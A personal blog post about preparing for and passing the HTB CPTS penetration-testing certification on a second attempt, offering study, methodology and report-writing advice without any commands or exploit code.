Archwarden
Go back

14 Flags

What It Actually Takes to Pass the CPTS Exam

14 Flags

The First Step

A year ago I had never solved a single Hack The Box machine. I had heard of flags and CTFs but had never run a port scan against a target I owned, and couldn’t have told you the difference between a foothold and a pivot. I was starting from zero with TryHackMe intros and an OK understanding of networking (CCNA), in a field whose main tagline is Try Harder.

I’m telling you that because the rest of this article is going to talk about passing the CPTS with 14 out of 14 flags, and I want that to land with the right context. This is achievable. The path is real. The course materials work. Six months of deliberate work got me from nothing to the top of one of the hardest practical certifications in the field.

It also took two attempts.

Fully Owned

CPTS certificate

When I finished the CPTS exam I had 14 flags. The exam was fully owned. On my second attempt.

The first attempt is the part I don’t see many people talk about honestly, so I will. I sat the exam and spent seven days stuck on the first flag. I did what most people do: looked online for hints, suggestions, anything that would move the needle. I found posts that talked about completing the CPTS track (I had), that the first flag was a gatekeeper, and my personal favorite: “Enumerate More.” What does that actually mean? Finally on my third Enumerate More pass I found the thing I had missed. Was it simple, dumb, and avoidable? ABSOLUTELY. After that I spent the last three days in a scramble that got me to flag nine before time ran out. Nine flags. I even got past the dreaded eighth flag. But I had failed.

I want to be clear about what happened there, because it wasn’t a skills problem. By the time I sat that first attempt I had the technical knowledge to pass. What I didn’t have was an understanding of what the exam was actually testing for, or how to approach a network I’d never seen before without any external structure to guide me. I was trying to work through it the way I’d worked through module labs, the way I had tackled AEN, trying to figure out what obvious thing I had missed. Seven days on one flag isn’t a skills gap. It’s a methodology gap.

On the second attempt I understood the exam. I knew what I was actually doing and why, had taken the time to approach the course material with fresh eyes, and I cleared the remaining flags in three days.

I’m not leading with any of this to brag. I’m leading with it because when I was preparing, I spent a lot of time reading posts from people who had passed, trying to understand what they actually did to get there. Most of what I found was vague. “Trust the process.” “Complete the path.” “You’ll know when you’re ready.” Direct exam hints aren’t allowed, and that’s fair. But that advice is only useful in hindsight. What I needed was something that would help me understand and assess where I actually stood before the exam.

So this is my attempt to be more specific. What the exam is, what it demands, what the path prepares you for, and where you’ll have to fill the gaps yourself. Basically, I’m going to try to explain what “Enumerate More” actually means.

What You’re Signing Up For

The CPTS is a ten-day practical exam. You get access to a network and the objective is to compromise it, escalating your access across systems and collecting flags along the way. At the end you submit a professional penetration testing report. The report is graded. You can pass the technical portion and still fail if your report doesn’t meet the standard.

Ten days sounds like a long time. It isn’t.

You will lean on web exploits, common privilege escalation paths, and some less common ones, along with CVE research, tunneling, ACL abuse, and hash cracking. Basically everything in the course. The one thing I will say clearly: I never had to brute force a password during the exam. There will always be a clue.

The exam is designed around a realistic engagement. You’re enumerating a network you’ve never seen before, building a picture of what’s there, finding attack paths, and executing them. There’s no answer key. There’s no hint system. When you’re stuck, you figure it out. When you go down a rabbit hole for two hours and find nothing, you back out and try something else.

That’s the job. The exam is testing whether you can do the job.

What the Path Prepares You For

HTB Academy CPTS path

The HTB Academy CPTS path is long. If you’ve completed it, you already know this. It covers a wide range of material, and it covers it well. By the time you finish, you should have solid footing in enumeration, common exploitation techniques, privilege escalation on both Linux and Windows, Active Directory attacks, lateral movement, and web application vulnerabilities.

The modules are genuinely good. The labs are hands-on. The skills you build are the skills the exam tests.

Complete the path. Do the skills assessments. Take the module labs seriously instead of copying commands and moving on. The people who get to the exam and feel underprepared are almost always the ones who rushed through the material to get to the end. Don’t just copy sections of the course into your notes. Build a usable set of cheat sheets you can actually understand quickly. If you can’t do that, you probably don’t understand the material yet. That’s OK, move on and come back to it. Some sections only made sense to me on a second pass.

What the Path Doesn’t Prepare You For

Here’s the part nobody talks about enough.

The CPTS path teaches you techniques. The exam tests whether you can deploy those techniques in an unfamiliar environment, under pressure, over a sustained period of time, without someone telling you which one to use next.

That’s a different problem.

In a module lab, the context tells you what to look for. You’re working through a web application exploitation module, so you already know web application techniques are relevant. The exam gives you nothing. You walk in, you run your initial enumeration, and everything you do from that point forward is a judgment call. What matters here? What’s a rabbit hole? Yes, there will be rabbit holes, and they will look real. I had a few dead-end exploits that still ended up as additional findings in my report.

The key thing to remember is that the CPTS doesn’t care whether you can search an entire file system for the word “password” or track down a niche CVE. That won’t get you flags. Be smart about your searches and your attacks. LOOK FOR THE CLUES.

The other thing the path doesn’t fully simulate is the sustained effort. Ten days on a single target is a different experience from completing labs module by module. You will hit stretches where nothing is working. You will second-guess paths you’ve already ruled out. You will feel, at some point, like you’ve missed something obvious. Almost everyone who passes goes through this.

The question is what you do when it happens.

The Answer Is Not AI

Claude, Gemini, and ChatGPT are tools, and they are allowed on the exam. Should you use them? The answer is a hesitant yes.

When you’re stuck and banging your head against a problem, this is not when AI comes to the rescue. For me, this was when AI wasted the most of my time. Most of the time it will have you check things you’ve already done, send you down complicated searches that are out of scope for the CPTS, and then cycle back to the beginning and start all over again.

AI walking the human

Have you ever seen a person walking their dog, but really it’s the dog walking the human? That’s the situation you don’t want to be in. I can say with confidence that AI did not lead me to a single flag. I actually had to fight it constantly when I wanted to try something I thought might work and just needed help with command syntax. I was told “this is the answer” on rabbit holes, and “this is a dead end” on what turned out to be the solution.

So when should you use AI? I don’t have a clean answer anymore. Between its refusal to help with anything that sounds like “harmful activities” and its tendency to hallucinate commands across tool versions, it’s left me here: it’s up to you. Just know when you’re fighting the AI instead of the exam. For me the best answer was to go for a walk. By the time I got back I’d have four or five ideas I hadn’t tried yet.

The Report Is Half the Exam

Pentest report

I want to be direct about this because I think a lot of people under-prepare for the reporting side: the report is not an afterthought. It is graded as part of the exam. You can find all the flags and still fail if your report doesn’t hold up.

A professional penetration testing report has a structure. Each finding needs to be clearly written, with an explanation of what the vulnerability is, how it was exploited, what the business impact is, and what the remediation looks like. The audience for a real report isn’t another pentester. It’s a technical lead or a manager who wasn’t in the room when you did the work.

If you’ve never written a pentest report before, do it before you sit the exam. Take a completed HTB machine or pro lab and write it up as if you were delivering it to a client. Practice the structure. Practice explaining findings clearly. By the time you’re in the exam, the reporting should be mechanical. You should be filling in a template you already know, capturing notes as you work, and writing up findings as you find them instead of trying to reconstruct everything in the last 24 hours.

Yes, use AI here. Use it to help with technical voice and language. I wrote my findings after every flag as I went. If you want examples of what a finished report looks like, every box on this site has a report attached. That’s what worked for me.

Staying In It

There will be a moment, probably around day four or five, where you’ve been at this for a while and you feel like you’re spinning. You’ve tried things. Some of them worked. Some didn’t. You’re not sure if the next step is something you know how to do or something you’ve missed entirely.

This is normal. Push through it. Take that walk.

The temptation at that point is to start running tools randomly hoping something surfaces, or to convince yourself that a flag you haven’t found yet requires a technique you haven’t learned. In my experience, there are clues. What have you found that’s weird? A solid methodology will surface the weird stuff, but you have to recognize it as different. Also remember that the flags have an order. Don’t chase root when you haven’t established a foothold. That’s not how this exam works. There is a path.

The problem is usually that you’re tired and the thinking isn’t as clear as it was on day one.

Take breaks. Sleep. Come back with fresh eyes. A path that was invisible at 2 AM has a way of becoming obvious after eight hours of sleep. The exam gives you ten days for a reason.

Before You Book It

A few things I’d want someone to know before they sit this exam.

People say do the Pro Labs. Dante especially. Truth told, I didn’t. I completed the CPTS track plus two boxes that came up repeatedly in other people’s suggestions: Forest and Tombwatcher. The reason I could skip the pro labs is that I watched videos on Ligolo and how to tunnel, double tunnel, and triple tunnel, then went back to the tunneling and pivoting section of the course and re-did those assessments with Ligolo until it was second nature. If you need help with the commands, I have a Ligolo page in my methodology.

The CPTS track boxes are retired machines and will have some solutions that fall outside the scope of CPTS learning. Keep that in mind and take away the ideas, not the commands.

Take notes as you go through the path and keep them. Your own notes, organized in a way that makes sense to you, are more useful in the exam than any external resource. You will want to reference something you did three months ago, and if you don’t have notes, you’re starting from scratch.

Three tools are worth knowing better for the exam than what the course covers on its own:

Then follow the “Take AEN Blind” advice. It’s the closest you’ll get to the exam experience, but a key difference is that AEN walks you through flags one at a time, while the exam chains vulnerabilities together to reach a single flag. Not much different in skill, but a different mindset. I wish I had understood that before my first attempt.

Get your report template ready before you start. Know what your findings sections look like, how you’re going to structure the executive summary, what your remediation language sounds like. The last thing you want is to be figuring out report structure while you still have flags to find.

Book the exam when you feel ready, not when you feel certain. The first attempt doesn’t count. That’s your learning attempt, the one where you see how everything I’m describing actually fits together. If you’ve completed the path, done the assessments seriously, and worked through the CPTS track, you have the skills. The rest is execution.

What It Meant

14 flags. I walked out of that exam having found everything there was to find. I learned to “Enumerate More” and actually understood what it meant. Here’s what it means to me.

“Enumerate More” is more than running tools. It’s more than deep searches. It’s taking the clues you’re given and understanding how to work with your toolset. What tool to use. How to use it better. Making educated guesses: this user looks like a clue, and I found this password somewhere odd. Maybe they go together. These are the things I wish I had understood before my first attempt, and had fully embraced by my second.

The CPTS is a hard exam. It’s designed to be hard. It’s testing something real, and that means it requires real preparation. But it’s also designed to be passable by someone who has put in the work. The path is good. The material is comprehensive. If you’ve done the work, the exam is a chance to show it.

The cert isn’t the main goal. It’s just the proof that you put in the work. The real goal is to understand and be comfortable doing the job.

Share this post on:
Share this post via WhatsApp Share this post on Facebook Share this post on X Share this post via Telegram Share this post on Pinterest Share this post via email
Next Post
From Hollywood to Hacker